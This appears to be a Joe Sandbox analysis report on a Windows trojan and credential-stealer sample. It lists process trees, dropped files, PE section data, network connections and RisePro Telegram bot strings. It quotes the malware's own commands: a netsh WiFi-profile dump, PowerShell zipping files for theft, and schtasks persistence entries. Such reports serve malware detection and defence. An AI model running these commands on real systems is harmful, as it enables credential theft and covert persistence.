Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot.604
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot4y
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot:y
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot=
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botH
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot=y
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botlaterH
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botrisepro4.60#
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49794 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name:
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: .idata
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: RageMP131.exe.14.dr Static PE information: section name:
Source: RageMP131.exe.14.dr Static PE information: section name: .idata
Source: RageMP131.exe.14.dr Static PE information: section name:
Source: MPGPH131.exe.14.dr Static PE information: section name:
Source: MPGPH131.exe.14.dr Static PE information: section name: .idata
Source: MPGPH131.exe.14.dr Static PE information: section name:
Source: explorgu.exe.24.dr Static PE information: section name:
Source: explorgu.exe.24.dr Static PE information: section name: .idata
Source: explorgu.exe.24.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File created: C:\Windows\Tasks\explorgu.job
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B05DC8 0_2_00B05DC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B4A220 0_2_00B4A220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B04E60 0_2_00B04E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004CA220 1_2_004CA220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C4330 1_2_004C4330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004B94E3 1_2_004B94E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C8DBB 1_2_004C8DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C8669 1_2_004C8669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00484E60 1_2_00484E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C8EDB 1_2_004C8EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C47C8 1_2_004C47C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004CA220 2_2_004CA220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C4330 2_2_004C4330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004B94E3 2_2_004B94E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C8DBB 2_2_004C8DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C8669 2_2_004C8669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00484E60 2_2_00484E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C8EDB 2_2_004C8EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C47C8 2_2_004C47C8
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\MPGPH131\MPGPH131.exe BECE1D107F2CFC2BF0D759D561578019ECD8C976D0143088FBC2BE78F69185DA
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll 3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: String function: 00B19750 appears 122 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 0049F620 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00499750 appears 244 times
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: Section: ZLIB complexity 0.9982091990616622
Source: explorha.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982091990616622
Source: ad0e9cf6d6.exe.6.dr Static PE information: Section: ZLIB complexity 0.9918853682375317
Source: ad0e9cf6d6.exe.6.dr Static PE information: Section: kmmiqwbd ZLIB complexity 0.989375925420823
Source: sarra[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9918870192307693
Source: sarra[1].exe.6.dr Static PE information: Section: plzndgzq ZLIB complexity 0.9895639173656415
Source: amert[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9975303460743802
Source: amert[1].exe.6.dr Static PE information: Section: nrhwmcml ZLIB complexity 0.9945326756386861
Source: amert.exe.6.dr Static PE information: Section: ZLIB complexity 0.9975303460743802
Source: amert.exe.6.dr Static PE information: Section: nrhwmcml ZLIB complexity 0.9945326756386861
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9918853682375317
Source: random[1].exe0.6.dr Static PE information: Section: kmmiqwbd ZLIB complexity 0.989375925420823
Source: RageMP131.exe.14.dr Static PE information: Section: ZLIB complexity 0.9918853682375317
Source: RageMP131.exe.14.dr Static PE information: Section: kmmiqwbd ZLIB complexity 0.989375925420823
Source: MPGPH131.exe.14.dr Static PE information: Section: ZLIB complexity 0.9918853682375317
Source: MPGPH131.exe.14.dr Static PE information: Section: kmmiqwbd ZLIB complexity 0.989375925420823
Source: explorgu.exe.24.dr Static PE information: Section: ZLIB complexity 0.9975303460743802
Source: explorgu.exe.24.dr Static PE information: Section: nrhwmcml ZLIB complexity 0.9945326756386861
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@38/31@3/5
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: cred64[1].dll.6.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64[1].dll.6.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: cred64[1].dll.6.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64[1].dll.6.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64[1].dll.6.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000008.00000002.2450226998.000002E174328000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cred64[1].dll.6.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Virustotal: Detection: 57%
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe ReversingLabs: Detection: 47%
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe"
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe "C:\Users\user\AppData\Local\Temp\1000049001\amert.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe "C:\Users\user\AppData\Local\Temp\1000049001\amert.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: textshaping.dll Jump to behavior
